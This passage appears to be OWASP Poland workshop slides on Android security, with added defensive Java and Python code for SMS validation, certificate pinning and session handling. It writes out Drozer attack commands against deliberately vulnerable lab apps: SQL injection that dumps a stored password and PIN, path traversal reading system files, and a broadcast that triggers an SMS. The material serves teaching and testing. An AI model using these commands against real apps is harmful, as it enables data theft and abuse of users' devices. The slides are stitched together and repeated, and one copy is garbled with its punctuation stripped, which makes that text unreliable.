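        if (!isValidRequest(phoneNumber, message)) {
            Log.w(TAG, "rejecting malformed SMS request");  // never log number or text
            return;
        }
        // SEND_SMS is a runtime permission from API 23 on; the app must hold it.
        SmsManager.getDefault().sendTextMessage(phoneNumber, null, message, null, null);
    }

    // Pure validation, kept separate from Android APIs so it can be unit-tested.
    static boolean isValidRequest(String phoneNumber, String message) {
        if (phoneNumber == null || message == null) return false;
        if (message.isEmpty() || message.length() > MAX_SMS_LENGTH) return false;
        // Assumed policy: plain international numbers only, which also rules out
        // the short codes used by premium-rate SMS fraud.
        return phoneNumber.matches("\\+[1-9][0-9]{7,14}");
    }
}
```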
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data-stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML Data Stores
  – Plain text configuration files
  – Cookie stores
  – SD Card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean „incorrectly”?
• Insecure implementations are:
  – Using known weak cipher versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in source code: the expected X509 certificate or public key
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
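The comparison in the pseudocode above, written out as an added example (not code from the talk): a hypothetical X509TrustManager that first runs the platform's normal chain-of-trust validation and then requires one certificate in the chain to carry a pinned public key. The pin format ("sha256/" + Base64 of the SHA-256 of the SubjectPublicKeyInfo) is the same one OkHttp and HPKP use; the pin value itself must be computed from the real server certificate and is a placeholder here.

```java
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

/*
 * Public-key pinning layered on top of ordinary chain validation (added
 * example, not from the talk). Pinning the key rather than the certificate
 * lets the server renew its certificate without breaking the app, as long as
 * it keeps the key. java.util.Base64 needs Java 8 / Android API 26; older
 * Android builds would use android.util.Base64 instead.
 */
public final class PinningTrustManager implements X509TrustManager {
    private final X509TrustManager chainValidator;  // the system default
    private final Set<String> pins;

    public PinningTrustManager(X509TrustManager chainValidator, String... pins) {
        this.chainValidator = chainValidator;
        this.pins = new HashSet<>(Arrays.asList(pins));
    }

    /** The platform trust store, i.e. the browser-style chain of trust. */
    public static X509TrustManager systemDefault() throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) return (X509TrustManager) tm;
        }
        throw new IllegalStateException("no X509TrustManager available");
    }

    /** "sha256/" + Base64(SHA-256(SubjectPublicKeyInfo)); run this once against the real server cert. */
    public static String pin(X509Certificate cert) {
        try {
            byte[] spki = cert.getPublicKey().getEncoded();
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(spki);
            return "sha256/" + Base64.getEncoder().encodeToString(digest);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 unavailable", e);
        }
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        // Step 1: ordinary validation (expiry, CA signature, key usage ...).
        // A "trust all certificates" manager skips this and accepts any MITM cert.
        chainValidator.checkServerTrusted(chain, authType);
        // Step 2: the slide's presented_cert == pinned_cert, done on the key.
        for (X509Certificate cert : chain) {
            if (pins.contains(pin(cert))) {
                return;  // Start_connection()
            }
        }
        throw new CertificateException("no pinned key in chain");  // Drop_connection()
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        chainValidator.checkClientTrusted(chain, authType);
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return chainValidator.getAcceptedIssuers();
    }
}
```

Install it with `new PinningTrustManager(PinningTrustManager.systemDefault(), "sha256/REPLACE_WITH_REAL_PIN=")` in an SSLContext; hostname verification is a separate step that pinning does not replace (the "accept all hostnames" failure below is independent of this check).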
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL Caching
• Copy/Paste buffer Caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged in user to another logged in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High Level – Java Code
• Disassembling
  – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
JAR, DEX → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modify Smali Files
Demo
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in code…
Broken Cryptography – real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– Another application, via an intent/content provider
– A shared file
– A server response
– A third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– Verify if a session expires (copy a cookie and try to use it after 30 minutes)
– Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged in user to another logged in user)
– Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should a session REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
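The three proxy checks from "how to find" and the mitigations above, as an added example that is not the workshop's code: a minimal server-side session store whose tokens come from the OS CSPRNG (never a device ID), which drops a session after an idle timeout, and which destroys the previous token when the authentication state changes. The 30-minute timeout and the FakeClock are assumptions made for the demonstration.

```python
"""Server-side session handling that passes the three proxy checks above.

Added example, not the workshop's code: tokens come from the OS CSPRNG
(never from a device ID), a session dies after an idle timeout, and a
change of authentication state destroys the earlier token. The 30-minute
timeout and the FakeClock are assumptions made for the demonstration.
"""
import hmac
import secrets
import time

IDLE_TIMEOUT = 30 * 60   # seconds; tune this to how the application is really used
TOKEN_BYTES = 32         # 256 bits of entropy per token


class SessionStore:
    def __init__(self, idle_timeout=IDLE_TIMEOUT, clock=time.time):
        self._sessions = {}            # token -> {"user": str, "last_seen": float}
        self._idle_timeout = idle_timeout
        self._clock = clock            # injectable so expiry can be demonstrated offline

    def login(self, user, previous_token=None):
        """Start a session for `user`; any token presented before the authentication
        change is destroyed, so it cannot be replayed as the old or the new user."""
        if previous_token is not None:
            self.logout(previous_token)
        token = secrets.token_urlsafe(TOKEN_BYTES)
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def logout(self, token):
        """Invalidate on the server side; deleting the cookie on the client is not enough."""
        self._sessions.pop(token, None)

    def user_for(self, token):
        """Return the user bound to `token`, or None if it is unknown or idle-expired.
        Tokens are compared with a timing-safe function; expired ones are dropped on sight."""
        if not isinstance(token, str) or not token.isascii():
            return None
        for stored, meta in list(self._sessions.items()):
            if not hmac.compare_digest(stored, token):
                continue
            now = self._clock()
            if now - meta["last_seen"] > self._idle_timeout:
                del self._sessions[stored]
                return None
            meta["last_seen"] = now
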